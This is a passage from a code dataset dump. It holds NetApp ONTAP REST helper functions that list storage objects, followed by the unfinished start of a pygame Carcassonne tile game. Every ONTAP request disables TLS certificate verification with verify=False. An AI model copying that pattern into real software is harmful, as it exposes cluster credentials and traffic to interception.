Interfaces :- \")\r\n    for inter in inters:\r\n        print(\"=====\")\r\n        print(\"Interface Name = %s\" % inter['name'])\r\n        print(\"Interface UUID = %s\" % inter['uuid'])\r\n\r\n\r\ndef show_disk(cluster: str, headers_inc: str):\r\n    \"\"\"List the Disk\"\"\"\r\n    url = \"https://{}/api/storage/disks\".format(cluster)\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n    tmp = dict(response.json())\r\n    disks = tmp['records']\r\n    print()\r\n    print(\" List of Disks:- \")\r\n    print(\"================\")\r\n    for disk in disks:\r\n        print(\"Disk Name :- %s\" % disk['name'])\r\n
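# Added usage sketch (not part of the original module): these helpers are meant to be\r\n# driven from the example scripts, roughly like this:\r\n#   args = parse_args(\"List disks\", [Argument(\"-c\", \"--cluster\", \"Cluster IP\", required=True)])\r\n#   headers = setup_connection(args.api_user, args.api_pass)\r\n#   show_disk(args.cluster, headers)\r\n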
\r\ndef show_node(cluster: str, headers_inc: str):\r\n    \"\"\"List the nodes\"\"\"\r\n    url = \"https://{}/api/cluster/nodes\".format(cluster)\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n    tmp = dict(response.json())\r\n    nodes = tmp['records']\r\n    print()\r\n    print(\" List of Nodes:- \")\r\n    print(\"================\")\r\n    for node in nodes:\r\n        print(\"Node Name :- %s\" % node['name'])\r\n        print(\"Node UUID :- %s\" % node['uuid'])\r\n\r\n\r\ndef get_key_igroup(\r\n        svm_name: str,\r\n        initiator_name: str,\r\n        cluster: str,\r\n        headers_inc: str):\r\n    \"\"\"Get UUID of the Initiator\"\"\"\r\n    # https://10.195.51.149:443 \"GET\r\n    # /api/protocols/san/igroups?svm.name=smog1&name=gt1\r\n    url = \"https://{}/api/protocols/san/igroups?svm.name={}&name={}\".format(\r\n        cluster, svm_name, initiator_name)\r\n\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    initdict = dict(response.json())\r\n    inits = initdict['records']\r\n    print()\r\n    print(\" UUID of Initiator Group :- \")\r\n    for init in inits:\r\n        print(\"Initiator Name = %s\" % init['name'])\r\n        print(\"Initiator UUID = %s\" % init['uuid'])\r\n        return (init['uuid'])\r\n\r\n\r\ndef show_igroup(svm_name: str, cluster: str, headers_inc: str) -> None:\r\n    \"\"\"Lists Igroup\"\"\"\r\n\r\n    print(\"Getting Initiator Group Details\")\r\n    print(\"===============================\")\r\n\r\n    url = \"https://{}/api/protocols/san/igroups?svm.name={}&fields=uuid\".format(\r\n        cluster, svm_name)\r\n\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    initdict = dict(response.json())\r\n    inits = initdict['records']\r\n    print()\r\n    print(\" List of Initiator Group :- \")\r\n    print()\r\n    for init in inits:\r\n        print(\"=====\")\r\n        print(\"Initiator Name = %s\" % init['name'])\r\n        print(\"Initiator UUID = %s\" % init['uuid'])\r\n\r\n\r\ndef show_lun(cluster: str, headers_inc: str) -> None:\r\n    \"\"\"Lists LUNs\"\"\"\r\n    print(\"======================\")\r\n    print()\r\n    lun_api_url = \"https://{}/api/storage/luns\".format(\r\n        cluster)\r\n    try:\r\n        response = requests.get(lun_api_url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    lundict = dict(response.json())\r\n    luns = lundict['records']\r\n    print()\r\n    print(\" List of LUNs :- \")\r\n    for lun in luns:\r\n        print(\"=====\")\r\n        print(\"LUN Name = %s\" % lun['name'])\r\n        print(\"LUN UUID = %s\" % 
lun['uuid'])\r\n\r\n\r\ndef get_key_lun(lun_name: str, cluster: str, headers_inc: str) -> None:\r\n \"\"\"Lists LUN\"\"\"\r\n print(\"======================\")\r\n print()\r\n lun_api_url = \"https://{}/api/storage/luns?name={}\".format(\r\n cluster, lun_name)\r\n try:\r\n response = requests.get(lun_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n lundict = dict(response.json())\r\n luns = lundict['records']\r\n print()\r\n print(\" List of LUNs :- \")\r\n for lun in luns:\r\n print(lun['uuid'])\r\n return lun['uuid']\r\n\r\n\r\ndef get_key_snapshot(\r\n svm_name: str,\r\n volume_name: str,\r\n snapshot_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" Get Snapshot Key\"\"\"\r\n vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n snap_api_url = \"https://{}/api/storage/volumes/{}/snapshots\".format(\r\n cluster, vol_uuid)\r\n try:\r\n job_response = requests.get(\r\n snap_api_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = job_response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n snapshotsdict = dict(job_response.json())\r\n snapshots = snapshotsdict['records']\r\n print()\r\n print(\"The UUID of the Snapshot is \")\r\n for snapshot in snapshots:\r\n if snapshot['name'] == snapshot_name:\r\n print(snapshot['uuid'])\r\n return snapshot['uuid']\r\n\r\n\r\ndef get_key_volumes(\r\n svm_name: str,\r\n volume_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" get volume keys\"\"\"\r\n print()\r\n url = \"https://{}/api/storage/volumes?name={}&svm.name={}\".format(\r\n cluster, volume_name, svm_name)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n respdict = dict(response.json())\r\n volumes = respdict['records']\r\n print(\"The UUID of the Volume is \")\r\n for volume in volumes:\r\n print(volume['uuid'])\r\n return volume['uuid']\r\n\r\n\r\ndef get_key_accountowner(account_name: str, cluster: str, headers_inc: str):\r\n print(\"======================\")\r\n print()\r\n account_api_url = \"https://{}/api/security/accounts?name={}\".format(\r\n cluster, account_name)\r\n try:\r\n response = requests.get(\r\n account_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n accountdict = dict(response.json())\r\n accounts = accountdict['records']\r\n print()\r\n print(\"Account UUID :- \")\r\n for account in accounts:\r\n print(account['owner']['uuid'])\r\n return account['owner']['uuid']\r\n\r\n\r\ndef show_account(cluster: str, headers_inc: str):\r\n \"\"\"Lists Accounts\"\"\"\r\n print(\"======================\")\r\n 
print()\r\n    account_api_url = \"https://{}/api/security/accounts\".format(\r\n        cluster)\r\n    try:\r\n        response = requests.get(\r\n            account_api_url,\r\n            headers=headers_inc,\r\n            verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    accountdict = dict(response.json())\r\n    accounts = accountdict['records']\r\n    print()\r\n    print(\" List of Accounts :- \")\r\n    for account in accounts:\r\n        print(\"=====\")\r\n        print(\"Account Name = %s\" % account['name'])\r\n        print(\"Account Owner Name = %s\" % account['owner']['name'])\r\n        print(\"Account Owner UUID = %s\" % account['owner']['uuid'])\r\n\r\n\r\ndef get_key_svms(svm_name: str, cluster: str, headers_inc: str):\r\n    \"\"\" get svm key\"\"\"\r\n    url = \"https://{}/api/svm/svms\".format(cluster)\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    svmsdict = dict(response.json())\r\n    svms = svmsdict['records']\r\n    print(\"The UUID of the SVM is \")\r\n    for svm in svms:\r\n        if (svm['name']) == svm_name:\r\n            print(svm['uuid'])\r\n            return svm['uuid']\r\n\r\n\r\ndef show_svm(cluster: str, headers_inc: str):\r\n    \"\"\" List the svm\"\"\"\r\n    url = \"https://{}/api/svm/svms\".format(cluster)\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n    tmp = dict(response.json())\r\n    svms = tmp['records']\r\n    print()\r\n    print(\" List of SVMs:- \")\r\n    print(\"================\")\r\n    for i in svms:\r\n        print(i['name'])\r\n    return response.json()\r\n\r\n\r\ndef show_volume(cluster: str, headers_inc: str, svm_name: str):\r\n    \"\"\" list the volumes\"\"\"\r\n    print()\r\n    print(\"Getting Volume Details\")\r\n    print(\"======================\")\r\n    url = \"https://{}/api/storage/volumes/?svm.name={}\".format(\r\n        cluster, svm_name)\r\n    try:\r\n        response = requests.get(url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(err)\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n    volumesdict = dict(response.json())\r\n    volumes = volumesdict['records']\r\n    print()\r\n    print(\"List of Volumes :- \")\r\n    print(\"===================\")\r\n    for volume in volumes:\r\n        print(\r\n            \"Volume Name :- %s; Volume UUID :- %s\" %\r\n            (volume['name'], volume['uuid']))\r\n\r\n\r\ndef show_snapshot(\r\n        svm_name: str,\r\n        volume_name: str,\r\n        cluster: str,\r\n        headers_inc: str):\r\n    \"\"\" list snapshots\"\"\"\r\n    vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n    print()\r\n    print(\"Getting Snapshot Details\")\r\n    print(\"========================\")\r\n    snap_api_url = \"https://{}/api/storage/volumes/{}/snapshots\".format(\r\n        cluster, vol_uuid)\r\n    try:\r\n
response = requests.get(\r\n snap_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n svmsdict = dict(response.json())\r\n svms = svmsdict['records']\r\n print()\r\n for svm in svms:\r\n print(svm['name'])\r\n return response.json()\r\n\r\n\r\ndef show_aggregate(cluster: str, headers_inc: str):\r\n \"\"\" list aggregates\"\"\"\r\n url = \"https://{}/api/storage/aggregates\".format(cluster)\r\n try:\r\n response = requests.get(url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n tmp = dict(response.json())\r\n aggr = tmp['records']\r\n print()\r\n print(\"List of Aggregates:- \")\r\n print(\"=====================\")\r\n for i in aggr:\r\n print(\"Aggregate Name = %s \" % i['name'])\r\n print(\"Aggregate UUID = %s \" % i['uuid'])\r\n\r\n\r\ndef check_job_status(job_status: str, headers_inc: str, cluster: str):\r\n \"\"\" check job status\"\"\"\r\n if job_status['state'] == \"failure\":\r\n if job_status['code'] == 460770:\r\n print(\"SVM Already Exists\")\r\n else:\r\n print(\"Operation failed due to :{}\".format(job_status['message']))\r\n elif job_status['state'] == \"success\":\r\n print(\"Operation completed successfully.\")\r\n else:\r\n job_status_url = \"https://{}/api/cluster/jobs/{}\".format(\r\n cluster, job_status['uuid'])\r\n try:\r\n job_response = requests.get(\r\n job_status_url, headers=headers_inc, verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(err)\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(err)\r\n sys.exit(1)\r\n job_status = job_response.json()\r\n time.sleep(5)\r\n check_job_status(job_status, headers_inc, cluster)\r\n\r\n\r\ndef show_qtree(\r\n svm_name: str,\r\n volume_name: str,\r\n cluster: str,\r\n headers_inc: str):\r\n \"\"\" Show Qtree\"\"\"\r\n print()\r\n vol_uuid = get_key_volumes(svm_name, volume_name, cluster, headers_inc)\r\n print()\r\n print(\"Getting Qtree Details\")\r\n print(\"======================\")\r\n qtree_api_url = \"https://{}/api/storage/qtrees?volume.uuid={}\".format(\r\n cluster, vol_uuid)\r\n try:\r\n response = requests.get(\r\n qtree_api_url,\r\n headers=headers_inc,\r\n verify=False)\r\n except requests.exceptions.HTTPError as err:\r\n print(str(err))\r\n sys.exit(1)\r\n except requests.exceptions.RequestException as err:\r\n print(str(err))\r\n sys.exit(1)\r\n url_text = response.json()\r\n if 'error' in url_text:\r\n print(url_text)\r\n sys.exit(1)\r\n\r\n qtreesdict = dict(response.json())\r\n qtrees = qtreesdict['records']\r\n print()\r\n print(\" List of Qtrees :- \")\r\n for qtree in qtrees:\r\n print(\"Qtree Name:-%s Qtree ID:-%s\" % (qtree['name'], qtree['id']))\r\n","repo_name":"NetApp/ontap-rest-python","sub_path":"examples/rest_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"91"}
+{"seq_id":"21756983306","text":"import json\r\nimport random\r\nimport numpy as np\r\nimport os\r\nimport pygame as pg\r\n\r\npageSize = (1024, 576)\r\nimageScale = 50 #How much to scale distances by so that they coincide with the size of tile sprites.\r\n\r\nclass Deck:\r\n\t#TODO: Need to add ability to set the first card in the deck to the starting tile.\r\n\tdef __init__(self, deckFile = \"decks/vanillaDeck.json\"):\r\n\t\t#TODO: we might be able to get something similar to \"Deck.__init__\" in a more generic way using __name__ to get the function name.\r\n\t\tprint(\"Deck.__init__: Creating deck\")\r\n\t\twith open(deckFile, \"r\") as f:\r\n\t\t\tself.tileList = json.loads(f.read())\r\n\r\n\t\tself.deck = []\r\n\t\tself.nTiles = 0 #total number of tiles in deck.\r\n\t\tself.drawPos = 0\r\n\t\tfor tileName in self.tileList:\r\n\t\t\tamount = self.tileList[tileName]['amount']\r\n\t\t\ttileDict = self.tileList[tileName]['tileDict']\r\n\r\n\t\t\t#TODO: Can this be done in one line?\r\n\t\t\ttileCount = 0\r\n\t\t\tfor i in range(amount):\r\n\t\t\t\tself.deck.append(Tile(tileDict,tileName))\r\n\t\t\t\tself.nTiles += 1\r\n\t\t\t\ttileCount += 1\r\n\t\t\t\tprint(f\"{self.nTiles:3d} {tileCount:3d} {tileName} loaded\")\r\n\t\tprint(\"\")\r\n\r\n\tdef shuffle(self, resetDrawPos = True, firstTile = \"startingTile\"):\r\n\t\tif firstTile is None:\r\n\t\t\tprint(\"Deck.shuffle: Shuffling deck\")\r\n\t\t\trandom.shuffle(self.deck)\r\n\t\telse:\r\n\t\t\tif firstTile in self.tileList:\r\n\t\t\t\tprint(f\"Deck.shuffle: Shuffling deck with {firstTile} as first tile.\")\r\n\t\t\t\tself.deck = []\r\n\t\t\t\tfor tileName in self.tileList:\r\n\t\t\t\t\tif firstTile == tileName:\r\n\t\t\t\t\t\tamount = self.tileList[tileName]['amount']-1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tamount = self.tileList[tileName]['amount']\r\n\t\t\t\t\ttileDict = self.tileList[tileName]['tileDict']\r\n\r\n\t\t\t\t\tself.deck = self.deck + [Tile(tileDict,tileName) for i in range(amount)]\r\n\r\n\t\t\t\trandom.shuffle(self.deck)\r\n\t\t\t\tself.deck.insert(0,Tile(self.tileList[firstTile]['tileDict'],firstTile))\r\n\t\t\telse:\r\n\t\t\t\tprint(f\"Deck.shuffle: Unable to find {firstTile}. Shuffling normally.\")\r\n\t\t\t\trandom.shuffle(self.deck)\r\n\r\n\t\tif resetDrawPos:\r\n\t\t\tprint(\"Deck.shuffle: resetting draw position.\")\r\n\t\t\tself.drawPos = 0\r\n\r\n\tdef draw(self):\r\n\t\tif self.drawPos < self.nTiles:\r\n\t\t\tnewTile = self.deck[self.drawPos]\r\n\t\t\tself.drawPos += 1\r\n\t\t\tprint(f\"Deck.draw: Drew a {newTile.tileName} tile.\")\r\n\t\t\treturn newTile\r\n\t\telse:\r\n\t\t\tprint(\"Deck.draw: Reached end of deck.\")\r\n\t\t\treturn None\r\n\r\n\tdef printTileList(self):\r\n\t\tprint(\"Deck.printTileList: Deck tile list:\")\r\n\t\tfor tileName in self.tileList:\r\n\t\t\tprint(f\"{tileName} x{self.tileList[tileName]['amount']}\")\r\n\t\t\t# print(self.tileList[tile]['tileDict'],\"\\n\")\r\n\t\t\tfor feature in self.tileList[tileName]['tileDict']:\r\n\t\t\t\tprint(f\" {feature}\")\r\n\t\t\t\tfor i in self.tileList[tileName]['tileDict'][feature]:\r\n\t\t\t\t\tprint(f\" {i}\")\r\n\t\tprint(\"\")\r\n\r\n\tdef printDeck(self, style = \"pretty\"):\r\n\t\tprint(\"Deck.printDeck: Deck contents in order:\")\r\n\t\t#print(self.deck) #prints dict obj locations\r\n\t\tfor tile in self.deck:\r\n\t\t\ttile.tileInfo(style = style)\r\n\t\t\t\r\n\r\n\r\n\r\nclass Tile:\r\n\t\"\"\"\r\n\tCarcassonne tiles are defined by their edges and center. The edges can be roads, cities, or fields. 
The centers can be monasteries, crossroads, or city entrances. Expansions can introduce other edges or centers. We call these parts of the tile \"features\".\r\n\r\n\tYou can divide the tile's edges into 12 portions (the center being a 13th portion). We represent this using a 13-element array of strings. For example the starting tile would be:\r\n\r\n\t\tself.sides = [city,city,city,field,road,field,field,field,field,field,road,field,None]\r\n\r\n\tthe last element of the list represents the center portion of the tile. None indicates that there is no special center to the tile.\r\n\r\n\tThis representation allows easy access for tile compatibility checks, but does not encode how tile elements (roads, cities, etc.) are connected. To store this information we keep a dictionary of the contents of the tile. Each dictionary entry will be a 2-d nested list. Each element will be a list of integers indicating which of the edge portions are connected. For example the starting tile would be:\r\n\r\n\t\tself.tileDict = {cities: [[0,1,2]], roads: [[10,4]], fields: [[11,3],[9,8,7,6,5]], monastery: [], cityEntrance: [], crossroad: []}\r\n\r\n\t\tTODO: Would a list of sets be better? Should we combine the center entries (monastery,cityEntrance,etc.) into just one entry called \"center\" or something?\r\n\t\"\"\"\r\n\r\n\tdef __init__(self, tileDictInput,tileNameInput, imageDir=\"sprites/tileImages\"):\r\n\r\n\t\t#TODO: This allows for portions of the tile to be overwritten and for some portions of the tile to remain undefined. Undefined edges will likely also be unrepresented in the tileDict.\r\n\t\t\r\n\t\tself.sides = [\"None\" for i in range(13)] \r\n\t\tfor feature in tileDictInput:\r\n\t\t\tfor i in tileDictInput[feature]:\r\n\t\t\t\tfor j in i:\r\n\t\t\t\t\tself.sides[j] = feature \r\n\r\n\t\tself.tileDict = tileDictInput\r\n\t\tself.tileName = tileNameInput\r\n\t\tself.neighbors = [None,None,None,None] #tile objects to the top, right, bottom, left sides of this tile in clockwise order\r\n\t\tself.printStyles = [\"pretty\",\"verbose\"]\r\n\t\tself.pos = None #this will become a 2-element numpy integer array giving the tile's x,y position; the orientation is stored separately in self.orient\r\n\t\tself.orient = 0 #Integer indicating the orientation of the tile (either 0,1,2,3, each step corresponding to rotating the tile 90 degrees clockwise)\r\n\r\n\t\tself.tileImage = pg.image.load(os.path.join(imageDir, self.tileName)+\".png\").convert()\r\n\t\tself.tileImage = pg.transform.scale(self.tileImage, (imageScale, imageScale))\r\n\t\tself.tileImageRect = self.tileImage.get_rect()\r\n\r\n\tdef tileInfo(self, style = \"pretty\"):\r\n\r\n\t\tif style == \"pretty\":\r\n\t\t\tprint(self.tileName)\r\n\t\t\tfor feature in self.tileDict:\r\n\t\t\t\tprint(f\" {feature}\")\r\n\t\t\t\tfor i in self.tileDict[feature]:\r\n\t\t\t\t\tprint(f\" {i}\")\r\n\t\t\tprint(\"\")\r\n\t\telif style == \"verbose\":\r\n\t\t\tprint(\"self.tileDict = \",self.tileDict)\r\n\t\t\tprint(\"self.sides = \",self.sides)\r\n\t\t\tprint(\"self.neighbors = \",self.neighbors, \"\\n\")\r\n\t\telse:\r\n\t\t\tprint(f\"invalid style: {style}\")\r\n\t\t\tprint(f\"valid print styles {self.printStyles}\")\r\n\r\n\tdef visualizeTile(self,style = \"image\" , vpos = (0,0)):\r\n\r\n\t\tif style == \"text\":\r\n\t\t\ts = [side[0] for side in self.sides] #first letter of each side feature.\r\n\t\t\tprint(\" ____________\",\"\\n\",\r\n\t\t\t \"| \\ 0| 1 |2 /|\",\"\\n\",\r\n\t\t\t \"|11\\ | | /3|\",\"\\n\",\r\n\t\t\t \"|___\\|___|/__|\",\"\\n\",\r\n\t\t\t \"| | | |\",\"\\n\",\r\n\t\t\t \"|10 | | 4|\",\"\\n\",\r\n\t\t\t \"|____|___|___|\",\"\\n\",\r\n\t\t\t \"| /| |\\ |\",\"\\n\",\r\n\t\t\t \"| 9/ | | \\\\5|\",\"\\n\",\r\n\t\t\t \"|_/_8|_7_|6_\\|\")\r\n\r\n\t\t\tprint(\" ____________________\",\"\\n\",\r\n\t\t\t \"| \\ \",s[0],\"| \",s[1],\" |\" ,s[2],\"/ |\",\"\\n\",\r\n\t\t\t \"|\" ,s[11],\"\\ | | /\" ,s[3],\"|\",\"\\n\",\r\n\t\t\t \"|____\\__|_____|_/____|\",\"\\n\",\r\n\t\t\t \"| | | |\",\"\\n\",\r\n\t\t\t \"|\" ,s[10],\" | \",s[12],\" | \",s[4],\"|\",\"\\n\",\r\n\t\t\t \"|____|__________|____|\",\"\\n\",\r\n\t\t\t \"| / | | \\ |\",\"\\n\",\r\n\t\t\t \"|\",s[9],\"/ | | \\\\\" ,s[5],\"|\",\"\\n\",\r\n\t\t\t \"|__/_\",s[8],\"|_\",s[7],\"_|\" ,s[6],\"\\__|\")\r\n\t\telif style == \"image\":\r\n\t\t\tif self.pos is None:\r\n\t\t\t\twindow.blit(self.tileImage, self.tileImageRect)\r\n\t\t\t\tpg.display.update()\r\n\t\t\telse:\r\n\t\t\t\twindow.blit(self.tileImage, tuple(self.pos))\r\n\t\t\t\tpg.display.update()\r\n\t\telse:\r\n\t\t\tprint(f\"invalid style: {style}\")\r\n\r\n\tdef rotateTile(self):\r\n\t\tif self.orient < 3:\r\n\t\t\tself.orient += 1\r\n\t\telse:\r\n\t\t\tself.orient = 0\r\n\r\n\t\tself.tileImage = pg.transform.rotate(self.tileImage, -90)\r\n\t\tself.visualizeTile(style=\"image\")\r\n\t\tprint(f\"Tile.rotateTile: rotating tile to {self.orient}.\")\r\n\r\nclass Map:\r\n\t\"\"\"\r\n\tThe map is a collection of tiles\r\n\t\"\"\"\r\n\tdef __init__(self, startingTile, mapCenter = np.array([0,0])):\r\n\t\tprint(f\"Map.__init__: building Map with {startingTile.tileName} as first tile.\")\r\n\t\tself.mapElements = [startingTile]\r\n\t\tstartingTile.pos = mapCenter\r\n\t\tstartingTile.orient = 0\r\n\t\tself.ordDirs = imageScale * np.array([[0, -1], [1, 0], [0, 1], [-1, 0]])\r\n\t\tself.validPositions = self.ordDirs + mapCenter #ordDirs, short for ordinal directions, specifies the relative positions up, right, down, left (going clockwise) of a given location\r\n\t\tprint(\"\")\r\n\r\n\tdef getValidPositions(self):\r\n\t\tprint(\"Map.getValidPositions: Creating new valid positions 
array\")\r\n\t\tself.validPositions = []\r\n\t\tfor tile in self.mapElements:\r\n\t\t\tif tile.neighbors[0] is None: #top\r\n\t\t\t\t#print(f\"Map.getValidPositions: top added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[0])\r\n\t\t\tif tile.neighbors[1] is None: #right\r\n\t\t\t\t#print(f\"Map.getValidPositions: right added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[1])\r\n\t\t\tif tile.neighbors[2] is None: #bottom\r\n\t\t\t\t#print(f\"Map.getValidPositions: bottom added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[2])\r\n\t\t\tif tile.neighbors[3] is None: #left\r\n\t\t\t\t#print(f\"Map.getValidPositions: left added\")\r\n\t\t\t\tself.validPositions.append(tile.pos + self.ordDirs[3])\r\n\r\n\tdef validPosition(self,pos):\r\n\t\tfor validPos in self.validPositions:\r\n\t\t\tif np.array_equal(pos,validPos):\r\n\t\t\t\tprint(f\"Map.validPosition: {pos} is a valid position.\")\r\n\t\t\t\treturn True\r\n\t\treturn False\r\n\r\n\tdef getNeighbors(self,pos):\r\n\t\tprint(f\"Map.getNeighbors: Getting neighbors of pos {pos}\")\r\n\t\tneighborsPos = pos + self.ordDirs\r\n\t\t#print(f\"Map.getNeighbors: {neighborsPos[0]} {neighborsPos[1]} {neighborsPos[2]} {neighborsPos[3]}\")\r\n\t\tneighbors = [None for i in range(4)]\r\n\t\tfor tile in self.mapElements:\r\n\t\t\tfor i in range(len(neighborsPos)):\r\n\t\t\t\tif np.array_equal(tile.pos,neighborsPos[i]):\r\n\t\t\t\t\tneighbors[i] = tile\r\n\t\treturn neighbors\r\n\r\n\tdef validOrientationSingle(self, newTile, oldTile, ordDir):\r\n\t\t#Get orientation\r\n\t\tnewTileOrient = newTile.orient\r\n\t\toldTileOrient = oldTile.orient\r\n\r\n\t\tnewTileSides = [i for i in range(12)]\r\n\t\tfor i in range(newTileOrient):\r\n\t\t\tnewTileSides = newTileSides[-3:] + newTileSides[:-3]\r\n\r\n\t\toldTileSides = [i for i in range(12)]\r\n\t\tfor i in range(oldTileOrient):\r\n\t\t\toldTileSides = oldTileSides[-3:] + oldTileSides[:-3]\r\n\r\n\t\tif np.array_equal(ordDir,self.ordDirs[0]):\r\n\t\t\tnewTileIndicies = newTileSides[:3]\r\n\t\t\toldTileIndicies = oldTileSides[6:9]\r\n\t\telif np.array_equal(ordDir,self.ordDirs[1]):\r\n\t\t\tnewTileIndicies = newTileSides[3:6]\r\n\t\t\toldTileIndicies = oldTileSides[9:]\r\n\t\telif np.array_equal(ordDir,self.ordDirs[2]):\r\n\t\t\tnewTileIndicies = newTileSides[6:9]\r\n\t\t\toldTileIndicies = oldTileSides[:3]\r\n\t\telse:\r\n\t\t\tnewTileIndicies = newTileSides[9:]\r\n\t\t\toldTileIndicies = oldTileSides[3:6]\r\n\r\n\t\tnewTileFeatures = [newTile.sides[i] for i in newTileIndicies]\r\n\t\toldTileFeatures = [oldTile.sides[i] for i in oldTileIndicies]\r\n\t\toldTileFeatures.reverse()\r\n\r\n\t\t#print(\"Map.validOrientationSingle: newTileFeatures \", newTileFeatures)\r\n\t\t#print(\"Map.validOrientationSingle: newTileIndicies \", newTileIndicies)\r\n\t\t#print(\"Map.validOrientationSingle: oldTileFeatures \", oldTileFeatures)\r\n\t\t#print(\"Map.validOrientationSingle: oldTileIndicies \", oldTileIndicies)\r\n\t\t#print(\"\")\r\n\r\n\t\tif newTileFeatures == oldTileFeatures:\r\n\t\t\tprint(f\"Map.validOrientationSingle: {ordDir} is valid direction given orientation.\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(f\"Map.validOrientationSingle: {ordDir} is not a valid direction given orientation.\")\r\n\t\t\treturn False\r\n\r\n\tdef validOrientation(self, newTile, neighbors):\r\n\t\t#TODO: range(len(neighbors)) will probably always be 4. 
